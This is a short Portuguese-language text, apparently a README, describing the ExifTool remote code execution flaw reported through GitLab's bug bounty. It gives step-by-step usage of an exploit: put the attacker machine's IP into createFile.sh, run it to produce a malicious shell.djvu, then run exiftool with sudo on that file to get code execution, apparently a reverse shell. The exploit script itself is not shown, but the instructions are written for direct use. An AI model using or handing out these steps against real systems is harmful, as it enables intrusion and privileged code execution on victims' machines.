
Recentemente, o pesquisador wcbowling encontrou uma vulnerabilidade na ferramenta Exiftool, que permitia a um ator malicioso realizar um ataque de Execução Remota de Código. Essa vulnerabilidade foi encontrada no programa de bug bounty do Gitlab, onde eles usam essa ferramenta como dependência para o seu produto.
Na linha 12 (createFile.sh), coloque o endereço IP da sua máquina atacante.

Então, basta executar:
$ bash createFile.sh
Isso criará o arquivo malicioso shell.djvu. Usando o exiftool, você pode obter execução remota de código:
$ sudo /usr/local/bin/exiftool shell.djvu